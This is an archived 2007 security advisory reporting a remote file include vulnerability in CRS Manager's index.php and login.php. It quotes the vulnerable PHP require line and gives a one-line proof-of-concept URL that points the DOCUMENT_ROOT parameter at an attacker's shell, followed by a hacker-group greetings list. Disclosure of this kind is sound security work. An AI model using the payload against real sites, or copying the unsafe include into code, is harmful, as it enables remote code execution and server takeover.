CRS Manager ($DOCUMENT_ROOT) Multi Remote File Include

2007-09-11T00:00:00
ID SECURITYVULNS:DOC:17959
Type securityvulns
Reporter Securityvulns
Modified 2007-09-11T00:00:00

Description

X---- w w w . u N k n 0 w n . e u ----X

CRS Manager(crsmanager) Multi Remote File Include

::Home: http://crsmanager.berlios.de

::Vuln Type : Remote File Include (RFI)

::Discovered by : iNs

::Vuln Code: index.php login.php

<?php require ($DOCUMENT_ROOT."/../admin/settings/conf.php");

PoC: index.php?DOCUMENT_ROOT=shell??

:: iNs @ uNkn0wn.eu ::

::Gr33tz t0: uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos - sh4m4n - Svarshik DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - r0x00k - str0ke